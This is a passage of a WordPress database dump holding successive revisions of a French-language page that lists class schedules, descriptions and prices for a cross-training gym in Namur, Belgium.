href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:19:09', '2014-08-31 08:19:09', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(446, 1, '2014-08-31 08:04:06', '2014-08-31 08:04:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:04:06', '2014-08-31 08:04:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(447, 1, '2014-08-31 08:05:26', '2014-08-31 08:05:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td> - </td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:05:26', '2014-08-31 08:05:26', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(448, 1, '2014-08-31 08:07:36', '2014-08-31 08:07:36', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:07:36', '2014-08-31 08:07:36', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(450, 1, '2014-08-31 08:10:52', '2014-08-31 08:10:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Réservé Squash</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img 